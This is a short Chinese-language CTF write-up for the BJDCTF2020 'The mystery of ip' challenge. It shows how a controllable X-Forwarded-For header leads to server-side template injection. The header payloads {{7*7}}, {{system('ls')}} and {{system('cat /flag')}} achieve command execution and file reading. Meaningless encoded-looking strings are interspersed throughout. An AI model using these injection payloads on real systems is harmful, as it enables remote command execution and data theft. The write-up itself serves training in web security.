[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip

uVa8PP8t8pJ6LrbAZeflzIoe51k25wXxucIHnHPRl78

UkAqdmEt9p8T_hVZqpZypZ69AcftogQ__1J_tav_at8

1FMX7hRoZjVZlk5gkqhVyAXvYhnm8QkGAnpGO4qcmYY

pmLK2aimppXSBSC58TVrR2oOrp2rV3514-gRYtLZsjk

hint页面的源代码里发现提示

应该是和IP相关,有可能用到XFF请求头,遂用BP抓包

k5AfJtxfW87gACEoYe0uDlHGzmdq9Nr1W_Eso-TccU0

修改了XFF之后,被成功执行,XFF可控,代码是php代码,推测:

PHP可能存在Twig模版注入漏洞

Smarty模板的SSTI漏洞(主要为Flask存在Jinjia2模版注入漏洞)

添加模板算式,{{7*7}}成功执行

9-td0WGk2lwNaIlO0d27nsy71e7QwkjujmXPPqG89sA

尝试是否能执行命令:X-Forwarded-For:{{system('ls')}}

4UBiykiLMLwq9sEmwErwhe1z85FSucom71aEH2aKV74

随后改为{{system('ls /')}}发现flag文件

gXuKp1ofETKM66lPn4_qAdasWLy7l_u1m_CMmembHgA

接着改为{{system('cat /flag')}}得到flag

8BBEVDwUjIqumzYV5xZGXH_VZ8-rOnfE6BkAxkB_pGI

posted on 2024-02-01 17:45  跳河离去的鱼  阅读(59)  评论(0编辑  收藏  举报